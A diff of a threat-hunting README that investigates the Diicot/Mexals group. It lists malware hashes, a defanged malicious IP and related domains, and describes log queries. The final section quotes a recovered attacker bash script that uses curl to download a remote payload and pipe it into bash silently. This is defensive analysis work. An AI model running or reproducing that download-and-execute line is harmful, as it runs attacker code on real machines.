AaronRMartinez/Threat-Hunting-Diicot-Mexals-Threat-Group/README.md

 malicious file.

 **diicot**
-SHA256: '9462261543bfaf008f4748c76a7a2aec95d67f73315d1adea1833d51f9ec29f6'
+SHA256: `9462261543bfaf008f4748c76a7a2aec95d67f73315d1adea1833d51f9ec29f6`

 **kauk**
-SHA256: '11d43b9ef1678a889cfbca33ca13314d07824753965cafb28d4030644a2c5ccd'
+SHA256: `11d43b9ef1678a889cfbca33ca13314d07824753965cafb28d4030644a2c5ccd`

-Revisiting the script used in the SSH brute force attack, the script executed both a 'curl' and a 'wget' command to download a file from the IP address '85[.]31[.]47[.]99'.
+Revisiting the script used in the SSH brute force attack, the script executed both a `curl` and a `wget` command to download a file from the IP address `85[.]31[.]47[.]99`.
 The script's redundancy on the IP address emphasized the importance of retrieving the file from the designated IP.
-Analyzing the IP address found in the script using VirusTotal revealed that '85[.]31[.]47[.]99' is classified as a malicious site.
+Analyzing the IP address found in the script using VirusTotal revealed that `85[.]31[.]47[.]99` is classified as a malicious site.
 Navigating to the “Relations” section on VirusTotal, several domains associated with the malicious IP address were found.

 <u>Domains</u>

 - digitaldatainsights[.]org
 - digital[.]digitaldatainsights[.]org

-The 'DeviceNetworkEvents' table was queried to determine whether the compromised system had successfully connected to the specified IP address.
+The `DeviceNetworkEvents` table was queried to determine whether the compromised system had successfully connected to the specified IP address.
 A thorough inspection of the network logs revealed that no successful connection had occurred.
 Concluding that no successful connection had occurred, the domain associated with the IP address was used in several queries to search across multiple log tables.
-Another script was found in the 'DeviceEvents' table that explicitly referenced the domain name in the code.
+Another script was found in the `DeviceEvents` table that explicitly referenced the domain name in the code.
 The script discovered:

 ```powershell
 #!/bin/bash\nif curl -s --connect-timeout 15 196[.]251[.]114[.]67/.x/black3; then\n curl -s 196[.]251[.]114[.]67/.x/black3 | bash >/dev/null 2>&1\nelse\n curl -s --connect-timeout 15 digital[.]digitaldatainsights[.]org/.x/black3 | bash >/dev/null 2>&1\nfi\n